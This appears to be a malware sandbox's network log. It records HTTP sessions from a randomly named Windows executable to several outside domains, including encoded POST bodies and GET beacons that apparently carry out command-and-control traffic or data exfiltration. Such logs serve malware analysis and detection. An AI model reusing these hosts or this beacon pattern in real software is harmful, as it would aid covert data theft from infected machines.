                                                                                                                    Data Ascii: InQ=1AbqsGSWvjVHP6cEPBfdZjZ4M17B62jDv0PzJ36RtADF3EgAFOucoiFXFXt1jmnaGJbq7+C0EidOX1O0cwRUO83j0hD5eNdZcE7jb/ANh87/SNkIqg13zHvmdpm+5ife4Jiop/9J4B3BpD5duZg2FEj/Tgs8X547lcRr+HDi2Hiwcl7GXNE+JsTScd5uRU5ljSV5lIXFiysM3UxdaGHJmEKNs47bNolKx4DuxzHPiRN0pyC8IqoyOKoROtp+Q3GsQ4608xQFnNphjPDzqjr/xwcjsZHP2YpAhnwduy1ZpymalGI3NsYxWypnX60rlFfb80lZ04S6VfXpmkHupS+68mjZhmbYnUvXMaJQ1X2DZa1kqdcuAI68nPRkj8mN4OOSG/+yj2vsBrE+c+H3p4fEaCuQv4TZzy9LprbKXIEiMMM8L1ON3j4YKXpGc8LOe9ufaEssTNsByi0ffVmA3r8leumumYZ4R0YsiIA0jSJHYe0aafiq0OVG8R0jxAoviIMO9031uik1+FLjSTkK/YBFI5py74BfKRSh/zYn9S+22ZBLK8CeIkyOcXv2Hgoc+5act0tFf/dba9dCINroIiSNlO761ATysBH7Kw4X3IipI0eLhxIh3Rb3WMZSJ7QTFnvsj8lo5QJ2fmOhVEcxgFtQfXfI9ULQZOR8MRMdh5SRaCO9vRSt8FEiWj+ftZQm+XgJBHKV579X+3h90ivJ4WeSmrlXJVPs3HQuGz4cK4owaBgt39w1S8OurS2syQrZZhLFsMUfVDnLx081mZp0Vb+wMRzaNM4ER5px3E1Xt6RWF/jJWX22cb3Q8pfXL3N+7cgz/8toQdOn52nShJxztXJ4gK+WMysP29sQX7JUKAjOCil9o2JimdDqFVp0K9A6VWiWKVIKuGSUop7Jy2Mw30Iz29Xqv/GdNp3g5BBNrDVZYV6D1QlCr5dklDZ7H4O9/bnH+tu0Pl0jbSuFlxW3Mvk+4P3drZvacTvwGtUEnKtVd5BFnyA8 [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.4498553.33.130.190803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 19:59:22.787769079 CET534OUTGET /0fox/?InQ=4CzKvyikl1JmGr8xOweoExseK3jSsW+NmDPUBHudsRDXm35ePvWJknN1Cj9rj3LGeee2ucHQDjkFWVqRWStwPvDloADmDN4KAHnmSf5T9qbzaKMNsg1yiE4=&4b0dM=fDYPF HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.weatherbook.live
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Nov 2, 2024 19:59:23.485035896 CET391INHTTP/1.1 200 OK
                                                                                                                    Server: openresty
                                                                                                                    Date: Sat, 02 Nov 2024 18:59:23 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 251
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 6e 51 3d 34 43 7a 4b 76 79 69 6b 6c 31 4a 6d 47 72 38 78 4f 77 65 6f 45 78 73 65 4b 33 6a 53 73 57 2b 4e 6d 44 50 55 42 48 75 64 73 52 44 58 6d 33 35 65 50 76 57 4a 6b 6e 4e 31 43 6a 39 72 6a 33 4c 47 65 65 65 32 75 63 48 51 44 6a 6b 46 57 56 71 52 57 53 74 77 50 76 44 6c 6f 41 44 6d 44 4e 34 4b 41 48 6e 6d 53 66 35 54 39 71 62 7a 61 4b 4d 4e 73 67 31 79 69 45 34 3d 26 34 62 30 64 4d 3d 66 44 59 50 46 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?InQ=4CzKvyikl1JmGr8xOweoExseK3jSsW+NmDPUBHudsRDXm35ePvWJknN1Cj9rj3LGeee2ucHQDjkFWVqRWStwPvDloADmDN4KAHnmSf5T9qbzaKMNsg1yiE4=&4b0dM=fDYPF"}</script></head></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.449886188.114.97.3803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 19:59:28.562911987 CET786OUTPOST /9apq/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.cc101.pro
                                                                                                                    Origin: http://www.cc101.pro
                                                                                                                    Referer: http://www.cc101.pro/9apq/
                                                                                                                    Content-Length: 200
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 47 46 4c 6a 41 31 56 45 39 45 72 79 45 31 76 64 56 67 76 48 65 54 66 4d 68 53 4f 54 42 46 2f 6a 56 36 78 58 73 6d 64 57 58 30 7a 56 43 4e 66 48 4a 69 4f 65 57 73 4f 49 57 43 69 58 41 4a 37 79 66 74 4f 67 65 70 36 6d 37 59 71 69 43 71 4b 55 47 71 58 33 71 65 4a 69 35 69 49 6c 42 38 4a 2b 46 44 55 4f 54 46 7a 68 53 66 7a 35 74 4c 43 78 79 2b 33 49 63 6b 7a 44 34 39 75 67 78 78 69 65 41 73 6b 65 4e 46 46 31 53 70 45 7a 35 58 67 74 45 65 72 79 75 44 33 34 43 69 31 47 34 4f 37 72 53 65 4d 6a 4a 64 39 54 64 33 67 72 54 58 46 7a 33 78 39 57 36 6c 6b 63 53 71 53 55 64 44 65 61 48 51 3d 3d
                                                                                                                    Data Ascii: InQ=GFLjA1VE9EryE1vdVgvHeTfMhSOTBF/jV6xXsmdWX0zVCNfHJiOeWsOIWCiXAJ7yftOgep6m7YqiCqKUGqX3qeJi5iIlB8J+FDUOTFzhSfz5tLCxy+3IckzD49ugxxieAskeNFF1SpEz5XgtEeryuD34Ci1G4O7rSeMjJd9Td3grTXFz3x9W6lkcSqSUdDeaHQ==


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    6192.168.2.449902188.114.97.3803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 19:59:31.098788023 CET806OUTPOST /9apq/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.cc101.pro
                                                                                                                    Origin: http://www.cc101.pro
                                                                                                                    Referer: http://www.cc101.pro/9apq/
                                                                                                                    Content-Length: 220
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 47 46 4c 6a 41 31 56 45 39 45 72 79 46 56 66 64 47 44 48 48 59 7a 66 44 75 79 4f 54 62 31 2f 64 56 36 74 58 73 69 45 4a 58 6d 6e 56 43 76 48 48 49 67 6d 65 52 73 4f 49 5a 69 69 65 50 70 37 73 66 74 43 47 65 6f 57 6d 37 59 2b 69 43 76 75 55 47 5a 76 6f 72 4f 4a 38 32 43 49 6e 4c 63 4a 2b 46 44 55 4f 54 45 44 59 53 66 37 35 74 36 79 78 30 64 76 50 44 55 7a 43 2f 39 75 67 31 78 69 61 41 73 6b 6f 4e 48 78 54 53 73 59 7a 35 54 73 74 45 4d 54 78 6b 44 33 2b 4e 43 31 59 2b 76 61 34 56 65 39 77 58 50 77 78 52 46 67 56 62 78 55 70 6d 41 63 42 6f 6c 41 76 50 74 62 67 51 41 6a 54 63 51 41 66 70 71 52 50 54 76 53 6d 66 66 46 51 59 48 70 4c 42 54 6f 3d
                                                                                                                    Data Ascii: InQ=GFLjA1VE9EryFVfdGDHHYzfDuyOTb1/dV6tXsiEJXmnVCvHHIgmeRsOIZiiePp7sftCGeoWm7Y+iCvuUGZvorOJ82CInLcJ+FDUOTEDYSf75t6yx0dvPDUzC/9ug1xiaAskoNHxTSsYz5TstEMTxkD3+NC1Y+va4Ve9wXPwxRFgVbxUpmAcBolAvPtbgQAjTcQAfpqRPTvSmffFQYHpLBTo=
                                                                                                                    Nov 2, 2024 19:59:32.264792919 CET1236INHTTP/1.1 405 Not Allowed
                                                                                                                    Date: Sat, 02 Nov 2024 18:59:32 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OvMUJIEle05e%2BhE9A5XBZjH7ZgOYLnN5GXBD3Xqiqndior%2BdAgeVR1BWRqNAdWnXiPlBH7N7snVmnczbO0KZyVv8pxz%2FHH3TgxY9Sv010PAaHcqMINxPXuYeesdFYPyZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8dc65cbaae98eab4-DFW
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1096&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=806&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                                    Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a
                                                                                                                    Nov 2, 2024 19:59:32.264806986 CET62INData Raw: 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a
                                                                                                                    Data Ascii: padding to disable MSIE and Chrome friendly error page -->
                                                                                                                    Nov 2, 2024 19:59:32.264815092 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    7192.168.2.449915188.114.97.3803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 19:59:33.933876038 CET10888OUTPOST /9apq/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.cc101.pro
                                                                                                                    Origin: http://www.cc101.pro
                                                                                                                    Referer: http://www.cc101.pro/9apq/
                                                                                                                    Content-Length: 10300
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 47 46 4c 6a 41 31 56 45 39 45 72 79 46 56 66 64 47 44 48 48 59 7a 66 44 75 79 4f 54 62 31 2f 64 56 36 74 58 73 69 45 4a 58 6d 2f 56 43 38 50 48 49 47 75 65 51 73 4f 49 55 43 69 62 50 70 36 77 66 74 4b 43 65 6f 4b 59 37 62 47 69 45 4a 69 55 41 73 44 6f 69 4f 4a 38 75 43 49 71 42 38 4a 72 46 46 30 52 54 46 2f 59 53 66 37 35 74 35 61 78 7a 4f 33 50 51 45 7a 44 34 39 76 68 78 78 6a 2f 41 76 56 64 4e 48 31 6c 53 59 55 7a 35 33 41 74 49 66 72 78 35 54 33 38 4b 43 30 4c 2b 76 58 67 56 65 52 38 58 4f 46 63 52 48 38 56 5a 68 52 4b 33 44 67 68 2f 45 49 58 52 74 72 38 59 41 2f 6b 54 68 45 69 76 71 46 37 48 72 62 4d 53 2f 4d 67 4a 43 68 33 59 6d 39 66 43 49 7a 67 32 70 70 45 41 6f 6d 67 4a 74 4d 6b 4c 38 42 6b 6e 41 6c 65 7a 68 34 4e 56 66 38 59 45 6e 66 6f 6e 59 6e 58 34 59 42 71 79 57 6c 37 51 6f 52 34 4d 32 6a 31 4f 48 68 6d 76 52 45 59 57 72 38 6a 35 4f 57 36 6e 65 69 53 54 66 76 4b 51 62 61 6e 78 42 77 6e 32 5a 58 56 55 44 67 42 4f 6e 62 57 4e 4e 53 30 68 73 36 63 58 74 37 62 69 78 76 44 61 39 [TRUNCATED]
                                                                                                                    Data Ascii: InQ=GFLjA1VE9EryFVfdGDHHYzfDuyOTb1/dV6tXsiEJXm/VC8PHIGueQsOIUCibPp6wftKCeoKY7bGiEJiUAsDoiOJ8uCIqB8JrFF0RTF/YSf75t5axzO3PQEzD49vhxxj/AvVdNH1lSYUz53AtIfrx5T38KC0L+vXgVeR8XOFcRH8VZhRK3Dgh/EIXRtr8YA/kThEivqF7HrbMS/MgJCh3Ym9fCIzg2ppEAomgJtMkL8BknAlezh4NVf8YEnfonYnX4YBqyWl7QoR4M2j1OHhmvREYWr8j5OW6neiSTfvKQbanxBwn2ZXVUDgBOnbWNNS0hs6cXt7bixvDa9ZrLplz3uOFKROyLUdr5Pw+ESY1CWZf+wkkpydgYv/ZVhTVTj9DvrJAKIe7Y2fg/oRxEa07SfRcda8rkO/G4M1HFm97m+EHS5gQ4HTe9/5Ls5GqD7bRpJKijGOgc+k5IUY1xwHV1LXu25u1E00EbJu/rn6WOUC5rDa7a/rdQfo+isG7JBnxrLFHbXjfAAcKmrXlATzbuTlfVVlB9SzPM5HGQo++LX7k0ibPQMN1AXU3Tp53qroXvEKQT7kEIzPxpOi8We5H99aq451tcTmgW7X4Yw/GVIRA/g13Glwh/IxlNoCfC2tOLmMje/b5ov1EDqvC+SnD3NXfSgJ9+0wwaOlcj9PqpPiARfWtMgI0OVnZY+/+3yHqtVxka3dLvKyEQ09bhALJAUN4NqW01qeJr9Vn9Bt02Clle9iEQlr2Y1bgy5aAZ+aKiEYpO1pWKFqtb62swKfG443gTzirqZa6lkMxrG8hXha4AebNDuTCFU7jCqQKs6hN/o32sYd7I3KH9A25CRCnT3IDaiotp1nNuN45+Fp73xtcrAKk9YPsC3MeESahUxif/x1V2vHqNsYNOWJjVrlm4LYdSHTpUY/uVnRbrsDa0jxa7KqTsyKOfM5kg7S3XdHPYoZou27ZYsErvZ3Q6Jzwfm7lwEQKjC58gvTB+08iCEq3fSsR [TRUNCATED]
                                                                                                                    Nov 2, 2024 19:59:36.415327072 CET1236INHTTP/1.1 405 Not Allowed
                                                                                                                    Date: Sat, 02 Nov 2024 18:59:36 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QuiocUgDOyeZjkpbKdXQ9ledmyDZ79e0MvMySGdQOuo7%2FdFLbQQFlvWtuZf7ZiIj0iDjXTPEmFPWxQNVhw0ULzTXx8iyk%2FMYyXRbDR8uNNV4xQguyVTxVmRdjwFDeAYc"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8dc65ccc8a63eaf2-DFW
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1119&sent=6&recv=13&lost=0&retrans=0&sent_bytes=0&recv_bytes=10888&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                                    Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a
                                                                                                                    Nov 2, 2024 19:59:36.415469885 CET68INData Raw: 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: padding to disable MSIE and Chrome friendly error page -->0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    8192.168.2.449924188.114.97.3803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 19:59:36.471643925 CET527OUTGET /9apq/?InQ=LHjDDAx19xzpDFr7DCXHGx3Itg+TAVeOcttpvXYQA3jhT8+aBAnUV8C6f3e3WqOmZ67HZ5Oe4rCfD6agN7j3icgk1As8EJsNFlQOYCfqBIjmoJeJzbnATgI=&4b0dM=fDYPF HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.cc101.pro
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Nov 2, 2024 19:59:37.662173986 CET1236INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 02 Nov 2024 18:59:37 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Last-Modified: Tue, 01 Oct 2024 05:45:59 GMT
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hFCv9yTAShv%2F5i9GAqh%2F6RbLWQIR8WxilU4n3tZ2bn9cGPvy61crx92Im77FQnplPkfwz7nXmvROQm0pA6MKVXcBvlt6AYlMnvMnGLJPzolZwTNaO5Jj5UBStdIWqEWh"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8dc65cdc592d4763-DFW
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1608&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=527&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 65 35 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e6 ac a2 e8 bf 8e e5 85 89 e4 b8 b4 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 36 65 61 65 62 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 3a 20 32 30 30 70 78 20 61 75 74 6f 20 30 3b 70 61 64 64 69 6e 67 3a 20 30 20 30 20 32 32 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a [TRUNCATED]
                                                                                                                    Data Ascii: e5f<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width,initial-scale=1.0"> <title></title> </head> <body style="background: #e6eaeb;"> <div style="position: relative;margin: 200px auto 0;padding: 0 0 22px;border-radius: 15px 15px 5px 5px;background: #fff;box-shadow: 10px 20px 20px rgba(101, 102, 103, .75);width:95%;max
                                                                                                                    Nov 2, 2024 19:59:37.662204981 CET1236INData Raw: 2d 77 69 64 74 68 3a 20 34 30 30 70 78 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 61 6e 76 61 73 20 69 64 3d 22 63 61 6e 76 61 73 22 20 77 69
                                                                                                                    Data Ascii: -width: 400px;color: #fff;text-align: center;"> <canvas id="canvas" width="200" height="200" style="display:block;position:absolute;top:-100px;left:0;right:0;margin:0 auto;background:#fff;border-radius:50%;"></canvas> <
                                                                                                                    Nov 2, 2024 19:59:37.662216902 CET424INData Raw: 6d 65 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 64 72 61 77 46 72 61 6d 65 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 74 78 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 20
                                                                                                                    Data Ascii: me(); function drawFrame() { ctx.clearRect(0, 0, canvas.width, canvas.height); ctx.save(); ctx.translate(ras, ras); ctx.beginPath();
                                                                                                                    Nov 2, 2024 19:59:37.662230968 CET1236INData Raw: 65 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 74 78 2e 73 74 72 6f 6b 65 53 74 79 6c 65 20 3d 20 22 23 30 30 61 32 66 66 20 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 74 78 2e 6c 69 6e
                                                                                                                    Data Ascii: e(); ctx.strokeStyle = "#00a2ff "; ctx.lineWidth = ras * 0.12; ctx.beginPath(); ctx.arc(0, 0, ras * 0.8, -Math.PI / 2, -Math.PI / 2 + index * Math.PI * 2 / 100, fa
                                                                                                                    Nov 2, 2024 19:59:37.662240982 CET356INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 64 72 61 77 46 72 61 6d 65 2c 20 32 30 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 69
                                                                                                                    Data Ascii: setTimeout(drawFrame, 20) } else if (index != 100) { index = 100; drawFrame() } else { document.title = '


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    9192.168.2.44995731.31.196.17803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
